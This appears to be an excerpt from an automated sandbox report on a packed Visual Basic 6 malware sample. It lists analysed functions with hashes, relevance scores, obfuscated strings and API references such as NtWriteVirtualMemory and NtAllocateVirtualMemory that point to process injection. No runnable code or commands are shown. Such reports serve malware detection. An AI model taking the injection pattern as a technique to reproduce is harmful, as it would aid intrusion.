Opcode ID: 024a8254e140696a37ad887c98d13fbbee3a071186220ed3152d098e58a8060c
Instruction ID: 29cc284552988f986c0c09f0ce88769aebca6448f4c55da4b17a3dd9a02c21ed
Opcode Fuzzy Hash: 024a8254e140696a37ad887c98d13fbbee3a071186220ed3152d098e58a8060c
Instruction Fuzzy Hash: FFD1DAB66083889FDB758F24DD95BDA3BB2BF09350F844129DD8D9B261D3709A81CB81

Uniqueness

Uniqueness Score: -1.00%

Function 02354EF8, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 254COMMON

Download Yara Rule

Strings

YTV, xrefs: 023553B0

Memory Dump Source

Source File: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false

Yara matches

Similarity

API ID:
String ID: YTV
API String ID: 0-1774803758
Opcode ID: 8486bc96b3beb207c02caa2101ff313eda7ce67295d592990bbe4f6299b8e121
Instruction ID: 0b2d9024221eb75ea5b6676d27555be5a55e8e0d7bc793c8ae8efc8cd12eb706
Opcode Fuzzy Hash: 8486bc96b3beb207c02caa2101ff313eda7ce67295d592990bbe4f6299b8e121
Instruction Fuzzy Hash: 4DB1C8B56083999FCF75CF68CD85BDA3BB2AF09350F844529DD8D9B221D3749A81CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0235506A, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 217COMMON

Download Yara Rule

Strings

YTV, xrefs: 023553B0

Memory Dump Source

Source File: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false

Yara matches

Similarity

API ID:
String ID: YTV
API String ID: 0-1774803758
Opcode ID: c3a27fd8ae5badc4cd0aeac275e52495651b61cddc1bf2dd9dab9a3eb9ca9c69
Instruction ID: 19924f4f5e1d4b1188db817a48df57ec69a6dc1db2b2f5631339c97b9f08cb54
Opcode Fuzzy Hash: c3a27fd8ae5badc4cd0aeac275e52495651b61cddc1bf2dd9dab9a3eb9ca9c69
Instruction Fuzzy Hash: 6891DDB52093999FDB35CF60CD85BCA3BA2AF5A310F84452DDD8D9B621D3709A85CF80

Uniqueness

Uniqueness Score: -1.00%

Function 023550E1, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 170nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,129AB9BF,?,00000000,?,?,?,?,-74C4B975), ref: 023552A3

Strings

YTV, xrefs: 023553B0

Memory Dump Source

Source File: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID: YTV
API String ID: 3527976591-1774803758
Opcode ID: de459defc44d021e42451ed7503e25a4de6acb51c1fee7fb6879260c32db3045
Instruction ID: 0befbac20f68ba3d8ca2553d64c8cfacd12cd7f4481ced61d4e44facce32e2ab
Opcode Fuzzy Hash: de459defc44d021e42451ed7503e25a4de6acb51c1fee7fb6879260c32db3045
Instruction Fuzzy Hash: 5E7194B16043889FDB75CE64DD85BCA3BB2FF59350F848129ED8D9B221D3755A828F80

Uniqueness

Uniqueness Score: -1.00%

Function 02351482, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 154COMMON

Download Yara Rule

Strings

okT, xrefs: 0235158E

Memory Dump Source

Source File: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false

Yara matches

Similarity

API ID:
String ID: okT
API String ID: 0-2531141726
Opcode ID: bce9f263ed6f7a726478a2e861876ed86f5f2923eb6a27c41858e29d9ed7db80
Instruction ID: f748cb7a401db8f93a6df8611670f3b970e3514198f146676efa1a5a55e6eabe
Opcode Fuzzy Hash: bce9f263ed6f7a726478a2e861876ed86f5f2923eb6a27c41858e29d9ed7db80
Instruction Fuzzy Hash: B351007510A7D59FDB318F38C995BDABBA26F02324F45868CCDCD4B992C3749686CB02

Uniqueness

Uniqueness Score: -1.00%

Function 0235520E, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,129AB9BF,?,00000000,?,?,?,?,-74C4B975), ref: 023552A3

Strings

YTV, xrefs: 023553B0

Memory Dump Source

Source File: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID: YTV
API String ID: 3527976591-1774803758
Opcode ID: c2f06e94218f74d9ceb113bab529ec316e1510c8be79fbfaac441ac887e72381
Instruction ID: c797afd9c550fd9cce2d9412e658ed68dc66a61a3fa7ebe06258e337699d020e
Opcode Fuzzy Hash: c2f06e94218f74d9ceb113bab529ec316e1510c8be79fbfaac441ac887e72381
Instruction Fuzzy Hash: 1451D1752097959FDB36CF20C985BCA3BA2AF0A314F88445DCD4D8B522D3709A92CF80

Uniqueness

Uniqueness Score: -1.00%

Function 02357C4D, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 125COMMON

Download Yara Rule

Strings

G3, xrefs: 02357C8F

Memory Dump Source

Source File: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false

Yara matches

Similarity

API ID:
String ID: G3
API String ID: 0-1093773867
Opcode ID: e0caad61402db1858552c9c2d72ab37303d385f7add1f61af71d3b6660d55425
Instruction ID: 065bb798d17d95aaf6e6758c7a4bb58eaaf7987b1df254a44299ea5ea294f6fc
Opcode Fuzzy Hash: e0caad61402db1858552c9c2d72ab37303d385f7add1f61af71d3b6660d55425
Instruction Fuzzy Hash: A341BD756043AA8FDB30DF68C885AEA77E2FF19710F84412AAD4DCB601E7308A45CB55

Uniqueness

Uniqueness Score: -1.00%

Function 02355FB1, Relevance: 2.8, Strings: 2, Instructions: 339COMMON

Download Yara Rule

Strings

]L, xrefs: 02355FC4
]\9N, xrefs: 02350825

Memory Dump Source

Source File: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: ]\9N$]L
API String ID: 2167126740-3910911895
Opcode ID: c4c892b80a6f2f2993bdabbbd96cfcee460583ed65aafb97aa886fa57ee602eb
Instruction ID: 7d963ed53c443e27d39a6615179f4a049ad68a3671127f7aef823456f374a385
Opcode Fuzzy Hash: c4c892b80a6f2f2993bdabbbd96cfcee460583ed65aafb97aa886fa57ee602eb
Instruction Fuzzy Hash: 1FD1FC726043558FDB74AF74CD41BEE7BB6AF85350F92852EDC899B210E7308A81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02359A38, Relevance: 1.7, APIs: 1, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48915f8cc23104ddfd7e9f07e0e2ac0d9ec78736880ff0cc957ba04d8ef6ce67
Instruction ID: 65990f5eca92a3ae30bc9f03cbd79ab3369a4a4505b0aeee588c41e7be31f246
Opcode Fuzzy Hash: 48915f8cc23104ddfd7e9f07e0e2ac0d9ec78736880ff0cc957ba04d8ef6ce67
Instruction Fuzzy Hash: 5A81EE30409A95CFDF3ACF34CA95BEA3BA2AF85320F45415ECC4D8BA65D3349A41CB81

Uniqueness

Uniqueness Score: -1.00%

Function 023599E0, Relevance: 1.7, APIs: 1, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d04be99a6eeb39c4bea6ee6346e9e1517d3d8280db61ed98883d4f32687520e
Instruction ID: 8d4f051f15df30d0d3192b02e3f69d3874c31a0a0bd926f490b0acb730d18682
Opcode Fuzzy Hash: 5d04be99a6eeb39c4bea6ee6346e9e1517d3d8280db61ed98883d4f32687520e
Instruction Fuzzy Hash: 0971EF30804A95CFDF39DF34C995BEA7BA2AF85320F51425ACC4D8F665D3349A41CB81

Uniqueness

Uniqueness Score: -1.00%

Function 02359A9F, Relevance: 1.7, APIs: 1, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c1f5c39885a28e7ded1faa630dbad2da43a586d6dbd7b27ae3f899727d95ecc
Instruction ID: 2e7a0473b232a46006774d295fb86b910d47c00ee87d46a841a97b051c22fd0e
Opcode Fuzzy Hash: 0c1f5c39885a28e7ded1faa630dbad2da43a586d6dbd7b27ae3f899727d95ecc
Instruction Fuzzy Hash: BE71F030504A95CFDF39DF34CA95BEA3BA2AF85320F41415ACC4D8F665D3349A41CB81

Uniqueness

Uniqueness Score: -1.00%

Function 02359B86, Relevance: 1.6, APIs: 1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b395fcaf5f60f4956c1cae1c28f9071c4a7b2df5b38990c9085d42fb3cffe79
Instruction ID: 85a490043db8f530caf2e62975e21413938f843712b1dea5203b68c821aaccc2
Opcode Fuzzy Hash: 3b395fcaf5f60f4956c1cae1c28f9071c4a7b2df5b38990c9085d42fb3cffe79
Instruction Fuzzy Hash: B9512330504A99CFDF39DF24CAA5BEA3BA2AF85320F50455DCC4D8F665D3349A81CB81

Uniqueness

Uniqueness Score: -1.00%

Function 02355B4A, Relevance: 1.6, APIs: 1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db118f1b76743f1e9f638dff993ba2b1a47360c4181794c042b2e0f9b8e861ae
Instruction ID: 639ea18ea6860059ddb8a6998963bb24950d9af82734feaaa8319329cd76d467
Opcode Fuzzy Hash: db118f1b76743f1e9f638dff993ba2b1a47360c4181794c042b2e0f9b8e861ae
Instruction Fuzzy Hash: CE41DE75109794CFCB249F35C8897EABBA2AF09360F95041DCCCD8B621D3749A86CF46

Uniqueness

Uniqueness Score: -1.00%

Function 0235747B, Relevance: 1.6, Strings: 1, Instructions: 355COMMON

Download Yara Rule

Strings

]\9N, xrefs: 02350825

Memory Dump Source

Source File: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false

Yara matches

Similarity

API ID:
String ID: ]\9N
API String ID: 0-3798285978
Opcode ID: a6d9f6e44e0f9aeee520750fa25ec47a8526f951e1692fc20ce8107e7ba94c9d
Instruction ID: 4b53eef5ab57f2551acf0bd74357d58da9ccb02cb4d98d9e63a11010828bbf2a
Opcode Fuzzy Hash: a6d9f6e44e0f9aeee520750fa25ec47a8526f951e1692fc20ce8107e7ba94c9d
Instruction Fuzzy Hash: E5D110B26043558FDB389F28CC84BEAB7A2EF99350F55412EDC8D9B314D7319A81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02355C7F, Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29d3e8ec41688802e0978eaad87ecc0b8af816da25a8aff658c76241f8fad6bb
Instruction ID: 66080bbceadcfa055c390fe5cc1afcc9d7b9852cd1290a91493ead1b264c06d0
Opcode Fuzzy Hash: 29d3e8ec41688802e0978eaad87ecc0b8af816da25a8aff658c76241f8fad6bb
Instruction Fuzzy Hash: 7431E33900A7948BDB258F32C9C4BDABBD69F06324F84054DCD8D47A21D370EA85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0235286A, Relevance: 1.6, Strings: 1, Instructions: 342COMMON

Download Yara Rule

Strings

]\9N, xrefs: 02350825

Memory Dump Source

Source File: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: ]\9N
API String ID: 2167126740-3798285978
Opcode ID: 64ee9a3ced9152f0c190a046bdc6d56651d39acdee62640808791b9337c51191
Instruction ID: d1c116a5a7fb60edd78e9ee91d4c2bb70f46425453a53bce0dd1384ea7b6a1ef
Opcode Fuzzy Hash: 64ee9a3ced9152f0c190a046bdc6d56651d39acdee62640808791b9337c51191
Instruction Fuzzy Hash: DED120B26043958BDB34AF24CC84BEE77B6EF89350F52412EDC8D9B215D7359A81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02354106, Relevance: 1.6, Strings: 1, Instructions: 319COMMON

Download Yara Rule

Strings

]\9N, xrefs: 02350825

Memory Dump Source

Source File: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false

Yara matches

Similarity

API ID:
String ID: ]\9N
API String ID: 0-3798285978
Opcode ID: 5c3df3fa42e1e3636c2d7d1f3b9a1a66238d0d47e4ba7a296eccb18c3b0b1d22
Instruction ID: b2babed84c83f61a5b8daf732e9f331878e8bed47feb3d3a234be1005fd83c61
Opcode Fuzzy Hash: 5c3df3fa42e1e3636c2d7d1f3b9a1a66238d0d47e4ba7a296eccb18c3b0b1d22
Instruction Fuzzy Hash: 8BD126716043958BDF359F78CC84BDA77A2EF89350F55822EDC8D8B259D7318982CB42

Uniqueness

Uniqueness Score: -1.00%

Function 023594E2, Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 172397c3e0bce3abfee95f333097fa1300a29c703cb547365b919359a50b0bd6
Instruction ID: a33ac6513f16b9440dc13a9ce900eefe1c6239af5902b4795e524ea630afa27a
Opcode Fuzzy Hash: 172397c3e0bce3abfee95f333097fa1300a29c703cb547365b919359a50b0bd6
Instruction Fuzzy Hash: B8212F750097C4CFD725CB60CA84BEA7B9A5F86320F49049DC98D0BA22C3B48A41CA15

Uniqueness

Uniqueness Score: -1.00%

Function 023558CA, Relevance: 1.6, APIs: 1, Instructions: 61fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,03887A84,-99B367C2,18F7C10C,-8D994A95), ref: 02355A20

Memory Dump Source

Source File: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 765e63e1eb6afc812b316b3b33973b88fa573f5dc426c391d3011b68cae8c7ea
Instruction ID: 058fbb7ac1dd559790757a82f43e8bae0db869754982df9fbea4dd3b60bc1295
Opcode Fuzzy Hash: 765e63e1eb6afc812b316b3b33973b88fa573f5dc426c391d3011b68cae8c7ea
Instruction Fuzzy Hash: EA2123766142448BDB74DF3889687DB77F6AFD5350F82452F9C8E9B748CB300682CA02

Uniqueness

Uniqueness Score: -1.00%

Function 02359531, Relevance: 1.6, APIs: 1, Instructions: 56nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL ref: 023595B2

Memory Dump Source

Source File: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 59a1c191a79246ca92b942511bf50057d1e9c73d0ba9c382c45878942debd0bb
Instruction ID: 5e8ba22184fcbb57c018a8b9f32855fa9373bfc809061467565cff63b3819b53
Opcode Fuzzy Hash: 59a1c191a79246ca92b942511bf50057d1e9c73d0ba9c382c45878942debd0bb
Instruction Fuzzy Hash: AF11CEB13083449FDB28CE68C9C4BEAB3A7AFE8300F45812EED4E87645CB345E00DA15

Uniqueness

Uniqueness Score: -1.00%

Function 02355CEC, Relevance: 1.6, APIs: 1, Instructions: 53memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 02355D34

Memory Dump Source

Source File: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: c243bbb17a642229e9237771f9b1b76deaeffd178f8af99d57b4852a79facad4
Instruction ID: 5e196b659bf1de527572492b9f2b211ab68612259d98baf1ac168e2d7c4d6379
Opcode Fuzzy Hash: c243bbb17a642229e9237771f9b1b76deaeffd178f8af99d57b4852a79facad4
Instruction Fuzzy Hash: 84118C716043988FDB35AE69C8D4BDEBBA2EF59744F81002DDC898B210D3309A85CB52

Uniqueness

Uniqueness Score: -1.00%

Function 023567FF, Relevance: 1.5, APIs: 1, Instructions: 11libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02356814

Memory Dump Source

Source File: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 964679784847c0c50f8f71ee1d83adaa7869260c586980666261c0aa260bf894
Instruction ID: 2a4d182073959773cfc75d6d559c9ca77f4d7d6d67e246029899ec197f3f4110
Opcode Fuzzy Hash: 964679784847c0c50f8f71ee1d83adaa7869260c586980666261c0aa260bf894
Instruction Fuzzy Hash: F0C08C32144808CEE305A314C803B8FB202AB80B00F044435940747E60CA2A89189993

Uniqueness

Uniqueness Score: -1.00%

Function 023507ED, Relevance: 1.4, Strings: 1, Instructions: 124COMMON

Download Yara Rule

Strings

]\9N, xrefs: 02350825

Memory Dump Source

Source File: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: ]\9N
API String ID: 1029625771-3798285978
Opcode ID: 4b9b0f608d5c0275c96562bcc45c64d0905680e1a8795a21f0ecc40aae252664
Instruction ID: 8229625971c9bed5f0ad8621d55cfc4b535dd0cd2079f1a866056c20e3144170
Opcode Fuzzy Hash: 4b9b0f608d5c0275c96562bcc45c64d0905680e1a8795a21f0ecc40aae252664
Instruction Fuzzy Hash: 284154B29043048FEB24AF318984BEAB7F2FF95360F52491EDC8997208D7308985CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0040D7B0, Relevance: 233.7, APIs: 118, Strings: 15, Instructions: 950COMMON

Download Yara Rule

APIs

__vbaI4Str.MSVBVM60(0040D0A4), ref: 0040D851
#608.MSVBVM60(?,00000000), ref: 0040D85F
__vbaVarTstEq.MSVBVM60(?,?), ref: 0040D887
__vbaFreeVar.MSVBVM60 ref: 0040D896
__vbaNew2.MSVBVM60(0040D0D4,00410390), ref: 0040D8B7
__vbaHresultCheckObj.MSVBVM60(00000000,0255F7F4,0040D0C4,00000014), ref: 0040D8DC
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D0E4,00000110), ref: 0040D906
__vbaStrMove.MSVBVM60 ref: 0040D915
__vbaFreeObj.MSVBVM60 ref: 0040D91E
#648.MSVBVM60(?), ref: 0040D93F
__vbaFreeVar.MSVBVM60 ref: 0040D94B
__vbaHresultCheckObj.MSVBVM60(00000000,00401130,0040CCB8,000002B4), ref: 0040D96C
#628.MSVBVM60(FGFG,00000001,?), ref: 0040D991
__vbaStrMove.MSVBVM60 ref: 0040D99C
__vbaStrCmp.MSVBVM60(0040D108,00000000), ref: 0040D9A8
__vbaFreeStr.MSVBVM60 ref: 0040D9BB
__vbaFreeVar.MSVBVM60 ref: 0040D9C7
__vbaNew2.MSVBVM60(0040D0D4,00410390), ref: 0040D9E9
__vbaHresultCheckObj.MSVBVM60(00000000,0255F7F4,0040D0C4,00000014), ref: 0040DA0E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D0E4,000000E0), ref: 0040DA38
__vbaStrMove.MSVBVM60 ref: 0040DA51
__vbaFreeObj.MSVBVM60 ref: 0040DA56
#706.MSVBVM60(00000001,00000000,00000000), ref: 0040DA62
__vbaStrMove.MSVBVM60 ref: 0040DA6D
__vbaVarDup.MSVBVM60 ref: 0040DA8F
#600.MSVBVM60(?,00000002), ref: 0040DA9E
__vbaFreeVar.MSVBVM60 ref: 0040DAAC
__vbaStrToAnsi.MSVBVM60(?,GRAHAMISM,0016FEA1), ref: 0040DAC6
__vbaStrToAnsi.MSVBVM60(00000000,Pilgrimatic1,00000000), ref: 0040DAD2
__vbaSetSystemError.MSVBVM60(00000000), ref: 0040DAE6
__vbaFreeStrList.MSVBVM60(00000002,00000000,?), ref: 0040DB07
#554.MSVBVM60 ref: 0040DB19
__vbaNew2.MSVBVM60(0040D0D4,00410390), ref: 0040DB32
__vbaHresultCheckObj.MSVBVM60(00000000,0255F7F4,0040D0C4,00000014), ref: 0040DB5D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D0E4,000000D0), ref: 0040DB8B
__vbaStrMove.MSVBVM60 ref: 0040DB9A
__vbaFreeObj.MSVBVM60 ref: 0040DBA3
__vbaNew2.MSVBVM60(0040D0D4,00410390), ref: 0040DBBC
__vbaHresultCheckObj.MSVBVM60(00000000,0255F7F4,0040D0C4,0000001C), ref: 0040DBE1
__vbaCastObj.MSVBVM60(?,0040D148), ref: 0040DC20
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040DC2B
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D158,00000058), ref: 0040DC45
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040DC55
__vbaStrToAnsi.MSVBVM60(00000000,Trtid), ref: 0040DC6D
__vbaSetSystemError.MSVBVM60(00756DD6,00000000), ref: 0040DC80
__vbaFreeStr.MSVBVM60 ref: 0040DC9B
#690.MSVBVM60(CRUSTIFICATION,radiolites,Undabbled,Reuniting1), ref: 0040DCBA
#593.MSVBVM60(?), ref: 0040DCDB
__vbaFreeVar.MSVBVM60 ref: 0040DCE9
__vbaStrToAnsi.MSVBVM60(00000000,Natteros4), ref: 0040DCFD
__vbaSetSystemError.MSVBVM60(00459409,00000000), ref: 0040DD10
__vbaFreeStr.MSVBVM60 ref: 0040DD2B
__vbaNew2.MSVBVM60(0040D0D4,00410390), ref: 0040DD4D
__vbaHresultCheckObj.MSVBVM60(00000000,0255F7F4,0040D0C4,00000014), ref: 0040DD78
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D0E4,000000C8), ref: 0040DDA9
__vbaFreeObj.MSVBVM60 ref: 0040DDB4
__vbaNew2.MSVBVM60(0040D0D4,00410390), ref: 0040DDC9
__vbaHresultCheckObj.MSVBVM60(00000000,0255F7F4,0040D0C4,00000014), ref: 0040DDEE
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D0E4,000000D8), ref: 0040DE14
__vbaStrMove.MSVBVM60 ref: 0040DE23
__vbaFreeObj.MSVBVM60 ref: 0040DE2C
__vbaNew2.MSVBVM60(0040D0D4,00410390), ref: 0040DE41
__vbaHresultCheckObj.MSVBVM60(00000000,0255F7F4,0040D0C4,0000004C), ref: 0040DE66
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D204,0000001C,?,?,?,?), ref: 0040DEB8
__vbaObjSet.MSVBVM60(?,?,?,?,?,?), ref: 0040DECD
__vbaFreeObj.MSVBVM60(?,?,?,?), ref: 0040DEDC
__vbaSetSystemError.MSVBVM60(0052C7AC), ref: 0040DEFC
__vbaNew2.MSVBVM60(0040D0D4,00410390), ref: 0040DF21
__vbaHresultCheckObj.MSVBVM60(00000000,0255F7F4,0040D0C4,00000014), ref: 0040DF4C
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D0E4,00000130), ref: 0040DF7A
__vbaStrMove.MSVBVM60 ref: 0040DF89
__vbaFreeObj.MSVBVM60 ref: 0040DF92
#594.MSVBVM60(?), ref: 0040DFAF
__vbaFreeVar.MSVBVM60 ref: 0040DFBB
__vbaNew2.MSVBVM60(0040D0D4,00410390), ref: 0040DFD4
__vbaHresultCheckObj.MSVBVM60(00000000,0255F7F4,0040D0C4,0000001C), ref: 0040DFF9
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D158,00000054,?,?,?,?), ref: 0040E04B
__vbaLateIdSt.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?), ref: 0040E08B
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?), ref: 0040E09A
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?), ref: 0040E0A2
__vbaSetSystemError.MSVBVM60(005BEFDC,00862849), ref: 0040E0CB
__vbaNew2.MSVBVM60(0040D0D4,00410390), ref: 0040E0EC
__vbaHresultCheckObj.MSVBVM60(00000000,0255F7F4,0040D0C4,00000014), ref: 0040E111
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D0E4,00000118), ref: 0040E13E
__vbaI2I4.MSVBVM60 ref: 0040E14A
__vbaFreeObj.MSVBVM60 ref: 0040E153
#554.MSVBVM60 ref: 0040E155
__vbaNew2.MSVBVM60(0040D0D4,00410390), ref: 0040E16E
__vbaHresultCheckObj.MSVBVM60(00000000,0255F7F4,0040D0C4,0000001C), ref: 0040E193
__vbaCastObj.MSVBVM60(?,0040D148), ref: 0040E1D6
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040E1E1
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D158,00000058), ref: 0040E1FB
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040E20B
__vbaSetSystemError.MSVBVM60 ref: 0040E225
#648.MSVBVM60(?), ref: 0040E252
__vbaFreeVar.MSVBVM60 ref: 0040E25E
__vbaNew2.MSVBVM60(0040D0D4,00410390), ref: 0040E277
__vbaHresultCheckObj.MSVBVM60(00000000,0255F7F4,0040D0C4,00000014), ref: 0040E2A2
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D0E4,000000E0), ref: 0040E2D0
__vbaStrMove.MSVBVM60 ref: 0040E2DF
__vbaFreeObj.MSVBVM60 ref: 0040E2E8
__vbaNew2.MSVBVM60(0040D0D4,00410390), ref: 0040E2FD
__vbaHresultCheckObj.MSVBVM60(00000000,0255F7F4,0040D0C4,0000001C), ref: 0040E322
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D158,00000060), ref: 0040E375
__vbaFreeObj.MSVBVM60 ref: 0040E37E
__vbaStrCopy.MSVBVM60 ref: 0040E3F5
__vbaFreeStr.MSVBVM60 ref: 0040E417

Strings

CRUSTIFICATION, xrefs: 0040DCB5
GRAHAMISM, xrefs: 0040DABD
RAKETVRNS, xrefs: 0040E358
Undabbled, xrefs: 0040DCAB
Trtid, xrefs: 0040DC64
holoenzyme, xrefs: 0040E3ED
FGFG, xrefs: 0040D980
Reuniting1, xrefs: 0040DCA6
nh, xrefs: 0040E0CD
Pilgrimatic1, xrefs: 0040DAC9
INDEVOUTLY, xrefs: 0040E3CB
Natteros4, xrefs: 0040DCF4
skinproblemers, xrefs: 0040DA7B
radiolites, xrefs: 0040DCB0
AFVENDELSE, xrefs: 0040E389

Memory Dump Source

Source File: 00000006.00000002.618539941.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.618535617.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.618554057.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.618558555.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$Free$New2$Move$ErrorSystem$Ansi$List$#554#648Cast$#593#594#600#608#628#690#706CopyLate
String ID: AFVENDELSE$CRUSTIFICATION$FGFG$GRAHAMISM$INDEVOUTLY$Natteros4$Pilgrimatic1$RAKETVRNS$Reuniting1$Trtid$Undabbled$holoenzyme$nh$radiolites$skinproblemers
API String ID: 3686463010-382408799
Opcode ID: 5489c3641d37ec58e9d9ff8987072380bdfa6c63bb5fc717bfb2c920918cd202
Instruction ID: 98f8f423e0c4852674fa7aaeeb0a9fd7459694220625c680af258252b8eac879
Opcode Fuzzy Hash: 5489c3641d37ec58e9d9ff8987072380bdfa6c63bb5fc717bfb2c920918cd202
Instruction Fuzzy Hash: B5827F709002199FDB24DFA5CD48F9ABBB8FF48304F10816AF549B72A1D7749989CF68

Uniqueness

Uniqueness Score: -1.00%

Function 023515F2, Relevance: 1.6, APIs: 1, Instructions: 94COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(B30E346C), ref: 02355774

Memory Dump Source

Source File: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 455d7a4fb06f620f1d6f84c8640c057d962f277b7d0734634d47ed1c741f528c
Instruction ID: d4ddd0c6e44b29e20749e69c37cb0f3a4be20c123485e93071d051b993c242ef
Opcode Fuzzy Hash: 455d7a4fb06f620f1d6f84c8640c057d962f277b7d0734634d47ed1c741f528c
Instruction Fuzzy Hash: 3741D66900DBD68AC7228B39C545BEABFD51F03234F8946CDCDCC0BDA2C3749696CA02

Uniqueness

Uniqueness Score: -1.00%

Function 02359D02, Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa972ff61eccc6b347b462c2eea3a7708591ae6d4c47363b47cd4bf9b221e985
